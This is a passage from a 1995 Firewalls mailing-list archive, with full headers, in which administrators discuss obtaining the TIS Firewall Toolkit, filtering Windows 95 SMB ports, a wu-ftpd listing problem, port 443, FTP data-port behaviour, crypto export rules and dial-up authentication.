consultant. cymro ydw i. user scratching post. o >o e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com o >o vox: 708.435.7076 fax: 708.435.7360 o >o "When I die, I want to go sleeping like my grandfather... o >o Not screaming like the passengers in his car." o > > **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Wed Oct 11 13:18:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA08208 for firewalls-outgoing; Wed, 11 Oct 1995 12:45:47 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA08199 for ; Wed, 11 Oct 1995 12:45:38 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id OAA20972 for ; Wed, 11 Oct 1995 14:43:35 -0500 Received: from segfs001.rollingmdws.pamd.cig.mot.com (segfs001.rollingmdws.pamd.cig.mot.com [160.4.63.51]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id OAA21686 for ; Wed, 11 Oct 1995 14:43:34 -0500 Received: from segws002.rollingmdws.pamd.cig.mot.com by segfs001.rollingmdws.pamd.cig.mot.com with smtp (Smail3.1.28.1 #10) id m0t373u-0011WBC; Wed, 11 Oct 95 14:43 CDT Received: by segws002.rollingmdws.pamd.cig.mot.com (Smail3.1.28.1 #10) id m0t370i-000VWyC; Wed, 11 Oct 95 14:40 CDT From: rthomas@pamd.cig.mot.com (Robert Owen Thomas) Message-Id: <9510111440.ZM16183@pamd.cig.mot.com> Date: Wed, 11 Oct 1995 14:40:15 -0500 In-Reply-To: Darryl Wagoner "Re: TIS FWTK?" (Oct 11, 2:25pm) References: X-Face: '+o0q01K;YU[Po[u16e?snj8;Ph$olcxk+[`d9&@_u}|*>qi52AcH"6z36pohM2<-EvKgoH[/FTF`GG)Csl`+9(6V/3W/BC9Pu3l0\2y$wGP@bj!Yn~f=_#.x.dYzEWFDe_MLBUIK\n[nkM_sq}/OjBILuOP$:F1#;YjjN3?PG8CJTwD"p/zT~^V_MqO\e Subject: Re: TIS FWTK? Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk what i neglected to mention was that i was unable to access ftp.tis.com, for some unknown reason. i did find the TIS toolkit in the COAST archives, however. -- o robert owen thomas: unix consultant. cymro ydw i. user scratching post. o o e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com o o vox: 708.435.7076 fax: 708.435.7360 o o "When I die, I want to go sleeping like my grandfather... o o Not screaming like the passengers in his car." o From firewalls-owner Wed Oct 11 13:52:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA09225 for firewalls-outgoing; Wed, 11 Oct 1995 13:29:39 -0700 Received: from ftp.com (ftp.com [128.127.2.122]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA09218 for ; Wed, 11 Oct 1995 13:29:36 -0700 Received: from ftp.com by ftp.com ; Wed, 11 Oct 1995 16:27:41 -0400 Received: from mailserv-F.ftp.com by ftp.com ; Wed, 11 Oct 1995 16:27:41 -0400 Received: from shishir.nepal by mailserv-F.ftp.com (5.0/SMI-SVR4) id AA14946; Wed, 11 Oct 95 16:24:37 EDT Date: Wed, 11 Oct 95 16:24:37 EDT Message-Id: <9510112024.AA14946@mailserv-F.ftp.com> To: rthomas@pamd.cig.mot.com Subject: Re: TIS FWTK? From: shishir@ftp.com (shishir belbase) Reply-To: shishir@ftp.com Cc: Firewalls@GreatCircle.COM Repository: mailserv-F.ftp.com, [message accepted at Wed Oct 11 16:24:28 1995] Originating-Client: nepal Content-Length: 334 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > does anyone know where i can obtain a copy of the TIS Firewall Toolkit? > as i understand it, this is freeware. i tried ftp.near.net, but they > have the TIS stuff under lock and key. > > any other suggested ftp/web sites? > ftp.tis.com under /pub/..... ftp.nec.com under /pub/security/... ( SOCKS stuff ) shishir From firewalls-owner Wed Oct 11 14:18:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10159 for firewalls-outgoing; Wed, 11 Oct 1995 14:00:36 -0700 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA10151 for ; Wed, 11 Oct 1995 14:00:32 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa08223; 11 Oct 95 16:46 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma013807; Wed, 11 Oct 95 16:29:25 -0400 Received: by tis.com (4.1/SUN-5.64) id AA20742; Wed, 11 Oct 95 16:46:03 EDT Date: Wed, 11 Oct 95 16:46:03 EDT From: Frederick M Avolio Message-Id: <9510112046.AA20742@tis.com> To: Firewalls@greatcircle.com, rthomas@pamd.cig.mot.com Subject: Re: TIS FWTK? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk try ftp.tis.com. try www.tis.com. It is freely available but licensed s/w and intended for experts to install and not for profit. read the LICENSE, README, and DISCLAIMER. Fred From firewalls-owner Wed Oct 11 14:33:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA11194 for firewalls-outgoing; Wed, 11 Oct 1995 14:27:05 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA11185 for ; Wed, 11 Oct 1995 14:27:00 -0700 Date: Wed, 11 Oct 1995 17:25:08 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951011172508.2105da1d@hobbes.orl.mmc.com> Subject: Windoze NT C2 ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kim rites: >I most correct you here. Both of the above Compaqs come with a network >interface card built in, so no configuration is possible without a card. >Thus I would assume the C2 certification covers that. Marketeers thrive on assunptions. To quote: "These are designated as file servers but were evaluated only for use as stand-alone workstations with no networking capability." Is that explicit enough ? Warmly, Padgett From firewalls-owner Wed Oct 11 14:43:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10899 for firewalls-outgoing; Wed, 11 Oct 1995 14:20:08 -0700 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA10892 for ; Wed, 11 Oct 1995 14:20:04 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa08570; 11 Oct 95 17:12 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma014142; Wed, 11 Oct 95 16:55:30 -0400 Received: by tis.com (4.1/SUN-5.64) id AA22322; Wed, 11 Oct 95 17:12:20 EDT Date: Wed, 11 Oct 95 17:12:20 EDT From: Frederick M Avolio Message-Id: <9510112112.AA22322@tis.com> To: darryl@sai.com, rthomas@pamd.cig.mot.com Subject: Re: TIS FWTK? Cc: Firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The COAST archives should not have this nor should any other site. We cannot enforce it but we do request that people NOT copy the FWTK to other sites. TOo many other sites copy once or twice and then never again. Or they copy only the source kit and not the doc kit. Or they leave off the LICENSE or README or DISCLAIMER. Our request is that people NOT put the FWTK on their FTP site nor on CDs for distribution. Over 8000 sites have retreived the FWTK code so I''d expect that ftp.tis.com is fairly accessible and perhaps you had DNS problems when you tried. Fred From firewalls-owner Wed Oct 11 14:44:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10869 for firewalls-outgoing; Wed, 11 Oct 1995 14:19:15 -0700 Received: from fshops.sfsu.edu (fshops.sfsu.edu [130.212.45.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA10861 for ; Wed, 11 Oct 1995 14:19:11 -0700 Received: from sansom@fshops.sfsu.edu by fshops.sfsu.edu (5.64/Tenon-1.35.01) id AA05598; Wed, 11 Oct 95 14:22:56 -0700 (PDT) Date: Wed, 11 Oct 95 14:22:56 -0700 (PDT) X-Sender: sansom@servo.fshops.sfsu.edu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: sansom@fshops.sfsu.edu (Rob Sansom) Subject: Windows 95 exporting Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a friend that recently setup some Windows 95 PC's on his network, and some of the people that use them say that they can access their 'Published' directories from the Internet. I don't have access to any Windows 95 machines (the only PC that is running it dosen't work), and I am supposed to help him configure his router as a packet filter. I imagine the 'Published' feature is something similar to Unix NFS, and uses a TCP port number for client access (?). If this is so, does anyone out there in the world of PC's know what this port number is so I can filter it with a router? Thanks in advance, Rob Sansom Franciscan Shops Inc. From firewalls-owner Wed Oct 11 15:01:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA12091 for firewalls-outgoing; Wed, 11 Oct 1995 14:54:05 -0700 Received: from styx.wsc.com (styx.wsc.com [198.4.124.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA12084 for ; Wed, 11 Oct 1995 14:54:01 -0700 Received: from hera.wscis.wsc.com (hera.wscis.wsc.com [198.4.125.3]) by styx.wsc.com (8.6.8/8.6.6) with ESMTP id RAA01974 for ; Wed, 11 Oct 1995 17:52:07 -0400 Received: from hermes.wscis.wsc.com (hermes [198.4.125.24]) by hera.wscis.wsc.com (8.6.8/8.6.6) with SMTP id RAA07176 for ; Wed, 11 Oct 1995 17:52:07 -0400 From: Andre Soto Message-Id: <199510112152.RAA07176@hera.wscis.wsc.com> Received: by hermes.wscis.wsc.com (NX5.67d/NX3.0X) id AA02861; Wed, 11 Oct 95 17:52:06 -0400 Date: Wed, 11 Oct 95 17:52:06 -0400 Received: by NeXT.Mailer (1.100) Received: by NeXT Mailer (1.100) To: firewalls@GreatCircle.COM Subject: wu-ftp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have wu-ftp pretty much set up. I am experiencing one problem though. When I ftp into my site I cannot see a listing of my filenames upon executing ls or dir. I have played with the permissions and the ownership. I even went as far as to set everything to 777. What have I done wrong? Any and all assistance is greatly appreciated. Thank you, Andre L. Soto asoto@wsc.com From firewalls-owner Wed Oct 11 15:02:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA12192 for firewalls-outgoing; Wed, 11 Oct 1995 14:56:15 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA12182 for ; Wed, 11 Oct 1995 14:56:08 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id QAA21878 for ; Wed, 11 Oct 1995 16:54:15 -0500 Received: from segfs001.rollingmdws.pamd.cig.mot.com (segfs001.rollingmdws.pamd.cig.mot.com [160.4.63.51]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id QAA00852 for ; Wed, 11 Oct 1995 16:54:14 -0500 Received: from segws002.rollingmdws.pamd.cig.mot.com by segfs001.rollingmdws.pamd.cig.mot.com with smtp (Smail3.1.28.1 #10) id m0t396L-0011V8C; Wed, 11 Oct 95 16:54 CDT Received: by segws002.rollingmdws.pamd.cig.mot.com (Smail3.1.28.1 #10) id m0t3938-000VWyC; Wed, 11 Oct 95 16:50 CDT From: rthomas@pamd.cig.mot.com (Robert Owen Thomas) Message-Id: <9510111650.ZM16443@pamd.cig.mot.com> Date: Wed, 11 Oct 1995 16:50:54 -0500 In-Reply-To: Frederick M Avolio "Re: TIS FWTK?" (Oct 11, 4:12pm) References: <9510112112.AA22322@tis.com> X-Face: '+o0q01K;YU[Po[u16e?snj8;Ph$olcxk+[`d9&@_u}|*>qi52AcH"6z36pohM2<-EvKgoH[/FTF`GG)Csl`+9(6V/3W/BC9Pu3l0\2y$wGP@bj!Yn~f=_#.x.dYzEWFDe_MLBUIK\n[nkM_sq}/OjBILuOP$:F1#;YjjN3?PG8CJTwD"p/zT~^V_MqO\e Subject: Re: TIS FWTK? Cc: darryl@sai.com, Firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hello, Fred-- thanx for the info, Fred. i will obtain an official distribution from your ftp site. no worries. certainly i am not stating that there is anything wrong with your site. as i said in my e-mail to you earlier, this is most likely a problem at my ISP site. this would not be the first time such demons arose. thanx, again. regards, --robert -- o robert owen thomas: unix consultant. cymro ydw i. user scratching post. o o e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com o o vox: 708.435.7076 fax: 708.435.7360 o o "When I die, I want to go sleeping like my grandfather... o o Not screaming like the passengers in his car." o From firewalls-owner Wed Oct 11 15:57:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA13242 for firewalls-outgoing; Wed, 11 Oct 1995 15:27:43 -0700 Received: from herne.newsedge.com (herne.newsedge.com [192.206.85.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA13235 for ; Wed, 11 Oct 1995 15:27:39 -0700 Date: Wed, 11 Oct 95 18:25:41 EST Message-Id: <9510111825.AA13540@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: Port question X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know what port 443 is used for? Check out: http://necxdirect.necx.com Your passed to port 8002 and then 443. Does anyone see any problems with opening up port 443 access to the net? Thanks for any help! From firewalls-owner Wed Oct 11 16:01:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA13390 for firewalls-outgoing; Wed, 11 Oct 1995 15:32:35 -0700 Received: from cs.umass.edu (freya.cs.umass.edu [128.119.40.195]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA13382 for ; Wed, 11 Oct 1995 15:32:31 -0700 Received: from thor.cs.umass.edu by cs.umass.edu (5.65/Ultrix3.0-C) id AA20008; Wed, 11 Oct 1995 18:30:23 -0400 Received: (from lmccarth@localhost) by thor.cs.umass.edu (8.6.12/8.6.9) id SAA16369; Wed, 11 Oct 1995 18:30:23 -0400 Message-Id: <199510112230.SAA16369@thor.cs.umass.edu> Subject: Re: International Encryption Protocols To: Firewalls@GreatCircle.COM Date: Wed, 11 Oct 1995 18:30:23 -0400 (EDT) Reply-To: firewalls@GreatCircle.COM (Firewalls Mailing List) In-Reply-To: <199510112017.NAA08945@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Oct 11, 95 01:17:42 pm From: futplex@pseudonym.com (Futplex) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1986 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ted Doty writes: > Certainly the signatory countries to the CoCom treaty all enforce similar > export controls to those enforced by the USA. Therefore, do not go looking > to purchase cryptography in the UK for use outside the UK. I think this is misleading. CoCom, the Coordinating Committee for Multilateral Export Controls, amounted to a non-proliferation pact to prevent the spread of supercomputers and other hot potatoes beyond the club of countries to untrusted (non-CoCom) countries. As far as I can tell it did not erect export barriers _between member countries_, except perhaps some ordinary red tape. Before it officially dissolved in early 1994, CoCom included, among others, all of the G7 plus a healthy chunk of Western Europe: Australia, Belgium, Canada, Denmark, France, Germany, Greece, Italy, Japan, Luxembourg, the Netherlands, Norway, Portugal, Spain, Turkey, the U.K., and the U.S. According to http://www.chemie.fu-berlin.de/adressen/org-fact.html, Austria, Finland, Ireland, South Korea, New Zealand, Singapore, Sweden, and Switzerland were voluntarily cooperating with the export restrictions. As far as CoCom was concerned, you could generally sell crypto from Britain to most of the net. This is a far cry from the position of the U.S. ITAR, which prohibits the export of strong confidentiality-protecting crypto to the U.K., for example. Most of the other CoCom signatories do _not_ enforce export controls similar to the U.S. ones. [...] > Note: the treaty has expired, but the signatory countries seem to still be > willing to follow it. Nobody really wants to see strong crypto widely > deployed. Make that "No government really wants...." and I'll agree with you. BTW, ftp://ftp.eff.org/pub/CAF/law/software-export-law contains an interesting, detailed memo dated 95/03/06, from a California law firm, giving an "Update on Current Status of U.S. Export Administration Regulations on Software Exports". -Futplex From firewalls-owner Wed Oct 11 16:30:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA15159 for firewalls-outgoing; Wed, 11 Oct 1995 16:17:39 -0700 Received: from VNET.IBM.COM (vnet.ibm.com [199.171.26.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA15148 for ; Wed, 11 Oct 1995 16:17:35 -0700 From: PESTONI@BUEVM1.VNET.IBM.COM Message-Id: <199510112317.QAA15148@miles.greatcircle.com> Received: from BUEVM1 by VNET.IBM.COM (IBM VM SMTP V2R3) with BSMTP id 5546; Wed, 11 Oct 95 19:15:38 EDT Date: Wed, 11 Oct 95 20:11:07 EDT To: firewalls@greatcircle.com Subject: Dial-up access Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear security gurus, I have a couple of questions about support for dial-up access. Can anyone point me to information about SLIP and PPP implementing TACACS/+ or RADIUS (unfortunately, I need to support DOS too)? How about concentrators for asynchronous lines (aka terminal server, aka access server) that include filtering (a la Cisco's 2511)? Regards, Florian. From firewalls-owner Wed Oct 11 16:43:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA15094 for firewalls-outgoing; Wed, 11 Oct 1995 16:15:03 -0700 Received: from safety.worldcom.com (safety.worldcom.com [198.64.193.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA15084 for ; Wed, 11 Oct 1995 16:14:56 -0700 Received: (from smtp@localhost) by safety.worldcom.com (8.7.1/8.6.9) id SAA16804 for ; Wed, 11 Oct 1995 18:05:30 -0500 (CDT) Received: from samba.worldcom.com(198.64.193.32) by safety.worldcom.com via smap (V1.3) id sma016801; Wed Oct 11 18:05:25 1995 Received: (smtp@localhost) by samba.worldcom.com (8.6.11/8.6.9) id SAA14875 for ; Wed, 11 Oct 1995 18:05:24 -0500 Received: from samba.worldcom.com(198.64.193.32) by samba.worldcom.com via smap (V1.3) id sma014873; Wed Oct 11 18:05:21 1995 Date: Wed, 11 Oct 1995 18:05:20 -0500 (CDT) From: Robert Dana Reply-To: Robert Dana Subject: NT FTP weirdness To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FTP.microsoft.com initiates all data port connections from random, high-numbered TCP ports, instead of the RFC-mandated port 20. This apparently was intentional- there's a registry setting called "EnablePortAttack" that, when turned on, will cause the server to initiate connections from 20 again. Of course, the reason I noticed this is that we were using a filtering rule for some machines in our firewall that allowed incoming TCP connections from port 20 to high-numbered destination ports so that outbound FTP would work. Since ftp.microsoft.com's FTP-data connections weren't coming from port 20, they weren't allowed in. I don't completely understand the rationale behind this "fix", and I'm wondering if there's some general weakness in the FTP protocol that I'm not aware of that they're trying to address. I'm familiar with the "FTP Bounce" attack (see ftp://avian.org/random/ftp-attack), and I'm wondering if this is some strange way of ensuring that somebody using an NT FTP server as the middleman in such an attack isn't initiating connections from a low-numbered port. Anybody know more? -Robert -- Robert Dana (713) 650-6522 x40 WorldCom Director of Network Services Wolf Communications, Houston, TX Go WorldCom! From firewalls-owner Wed Oct 11 17:13:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16529 for firewalls-outgoing; Wed, 11 Oct 1995 17:02:28 -0700 Received: from databus.databus.com (databus.databus.com [198.186.154.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA16518 for ; Wed, 11 Oct 1995 17:02:25 -0700 Date: Wed, 11 Oct 95 20:00 EDT Message-ID: <9510112000.AA22948@databus.databus.com> From: Barney Wolff To: Andre Soto , firewalls@GreatCircle.COM Subject: Re: wu-ftp Content-Length: 618 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Andre Soto > Date: Wed, 11 Oct 95 17:52:06 -0400 > > I have wu-ftp pretty much set up. I am experiencing one problem though. > When I ftp into my site I cannot see a listing of my filenames upon > executing ls or dir. I have played with the permissions and the ownership. > I even went as far as to set everything to 777. What have I done wrong? wu-ftpd expects ls to be at /bin/ls - if it's not, because it's elsewhere or because you're chroot'd, it can't do the dir. Look for the string "/bin/ls" in ftpd.c and either fix it or put ls there. Barney Wolff From firewalls-owner Wed Oct 11 17:37:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA16824 for firewalls-outgoing; Wed, 11 Oct 1995 17:09:42 -0700 Received: from sdwsys (lig.cinti.net [204.248.145.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA16811 for ; Wed, 11 Oct 1995 17:09:38 -0700 Received: by sdwsys (Linux Smail3.1.28.1 #20) id m0t3BAu-0009z2C; Wed, 11 Oct 95 20:07 EDT Message-Id: From: sdw@lig.net (Stephen D. Williams) Subject: Re: Windows 95 exporting To: sansom@fshops.sfsu.edu (Rob Sansom) Date: Wed, 11 Oct 1995 20:07:03 -0400 (EDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Rob Sansom" at Oct 11, 95 02:22:56 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1223 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 139 mainly, but tcp/udp 138,139, and another I can't remember off the top of my head are mentioned in reference to SMB networking. 139 tcp is the main one. (There is smb service and nmb (name, optional) involved.) > I have a friend that recently setup some Windows 95 PC's on his network, > and some of the people that use them say that they can access their > 'Published' directories from the Internet. I don't have access to any > Windows 95 machines (the only PC that is running it dosen't work), and I am > supposed to help him configure his router as a packet filter. I imagine > the 'Published' feature is something similar to Unix NFS, and uses a TCP > port number for client access (?). If this is so, does anyone out there in > the world of PC's know what this port number is so I can filter it with a > router? > > Thanks in advance, > > Rob Sansom > Franciscan Shops Inc. > sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From firewalls-owner Wed Oct 11 18:17:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18273 for firewalls-outgoing; Wed, 11 Oct 1995 17:49:14 -0700 Received: from mom.hooked.net (mom.hooked.net [199.2.134.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA18259 for ; Wed, 11 Oct 1995 17:49:10 -0700 From: tferro@raptor.com Received: from 204.212.195.84 (bass-20.ppp.hooked.net [204.212.195.84]) by mom.hooked.net (8.6.10/8.6.5) with SMTP id RAA00991; Wed, 11 Oct 1995 17:47:12 -0700 Date: Wed, 11 Oct 1995 17:47:12 -0700 Message-Id: <199510120047.RAA00991@mom.hooked.net> Subject: Re: TIS FWTK? To: tony@raptor.com X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Tony, If 8000 downloaded it, maybe it's true that 2500 are installed. Who knows! <---- Begin Included Message ----> Cc: Firewalls@GreatCircle.COM Date: Wed, 11 Oct 95 17:12:20 EDT From: Frederick M Avolio Sender: firewalls-owner@GreatCircle.COM Subject: Re: TIS FWTK? To: darryl@sai.com, rthomas@pamd.cig.mot.com The COAST archives should not have this nor should any other site. We cannot enforce it but we do request that people NOT copy the FWTK to other sites. TOo many other sites copy once or twice and then never again. Or they copy only the source kit and not the doc kit. Or they leave off the LICENSE or README or DISCLAIMER. Our request is that people NOT put the FWTK on their FTP site nor on CDs for distribution. Over 8000 sites have retreived the FWTK code so I''d expect that ftp.tis.com is fairly accessible and perhaps you had DNS problems when you tried. Fred <---- End Included Message ----> --------------------------------------------------------------------------- Tony Ferro - Systems Engineer E-mail: tferro@raptor.com Raptor Systems Phone: 408.524.2990 1250 Oakmead Pkwy; Suite 210 Fax: 408.524.2988 Sunnyvale, CA 94088 Home Page: http://www.raptor.com/ --------------------------------------------------------------------------- From firewalls-owner Wed Oct 11 18:17:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18227 for firewalls-outgoing; Wed, 11 Oct 1995 17:47:55 -0700 Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA18220 for ; Wed, 11 Oct 1995 17:47:51 -0700 Received: from wittsend.UUCP by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.16) via UUCP id AA15378 ; Wed, 11 Oct 95 20:45:51 -0400 Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Wed, 11 Oct 95 20:42 EDT Message-Id: Subject: Re: Port question To: Chris.Brenton@newsedge.com Date: Wed, 11 Oct 1995 20:42:42 -0400 (EDT) From: "Michael H. Warfield" Cc: firewalls@greatcircle.com In-Reply-To: <9510111825.AA13540@herne.newsedge.com> from "Chris Brenton" at Oct 11, 95 06:25:41 pm X-Mailer: ELM [version 2.4 PL20] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 962 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Brenton enscribed thusly: > > Does anyone know what port 443 is used for? Check out: > http://necxdirect.necx.com > Your passed to port 8002 and then 443. Does anyone see any problems with opening > up port 443 access to the net? Port 443 is the current convention for SSL secure http (https). Secure Netscape Commerce servers and other HTTP servers which are SSL enabled (SSLeay package) use that port by default for secure encrypted connections. Port 80 continues to be used for non-secure http. Netscape browsers when encountering an https: URL will, by default, make a call to port 443 instead of the http: default of 80. > Thanks for any help! Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From firewalls-owner Wed Oct 11 18:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18539 for firewalls-outgoing; Wed, 11 Oct 1995 17:55:43 -0700 Received: from nexus.ptech.com (aegis.ptech.com [165.166.50.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA18532 for ; Wed, 11 Oct 1995 17:55:40 -0700 Received: from felix by nexus.ptech.com (5.x/Piedmont Technology Group) id AA15492; Wed, 11 Oct 1995 20:52:42 -0400 Date: Wed, 11 Oct 1995 20:52:40 -0400 Message-Id: <9510120052.AA15492@nexus.ptech.com> X-Sender: jnb@ptech.com X-Mailer: Windows Eudora Version 2.0.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: , From: jim.brown@ptech.com (Jim Brown) Subject: Re: Port question Sender: firewalls-owner@GreatCircle.COM Precedence: bulk TCP 443 is the conventional port that SSL-enabled HTTP uses. So you should probably apply the same policy to 443 as you would to port 80 .... Regards, Jim At 06:25 PM 10/11/95 EST, Chris.Brenton@newsedge.com wrote: >Does anyone know what port 443 is used for? Check out: > >http://necxdirect.necx.com > >Your passed to port 8002 and then 443. Does anyone see any problems with opening >up port 443 access to the net? > >Thanks for any help! > > > > _________ ___jnb___ From firewalls-owner Wed Oct 11 18:52:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA19928 for firewalls-outgoing; Wed, 11 Oct 1995 18:28:28 -0700 Received: from commsun.its.csiro.au (commsun.its.csiro.au [152.83.8.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA19913 for ; Wed, 11 Oct 1995 18:28:18 -0700 Received: (from fit106@localhost) by commsun.its.csiro.au (8.6.10/8.6.10) id LAA17127; Thu, 12 Oct 1995 11:26:15 +1000 Date: Thu, 12 Oct 1995 11:26:14 +1000 (EST) From: Kent Fitch To: firewalls@greatcircle.com Subject: Summary: securing modem access: RADIUS or TACACS+ with PGP auth In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Last week I posted this list asking for experiences using TACACS+ or RADIUS (or anything else) to implement dial-in modem security from dispersed terminal servers with modem pools using a central server to issue and check a PGP challenge. On Tue, 3 Oct 1995, Jim Thompson wrote: > I'm one-half, (Jes is the other half), of the team implementing > Cisco's commercial TACACS+ server. (e.g. we're under contract to Cisco.) > > It wouldn't be very hard at all to roll PGP into the 'side' of the server. > S/Key already works. > > Smallworks also makes and sells 'Netgate', a filtering firewall for > SunOS 4.1.X and Solaris 2.X, in case you've not heard of us before. > > If you want to take this off-line and discuss it, we'd me more than > happy to do so. On Tue, 3 Oct 1995 cjc@novell.com wrote: > We're in the middle of a big project to upgrade all our dial-in > gateways to use one-time password schemes. > > Right now, we've got gateways based on Livingston terminal servers, > NetWare Connect, and 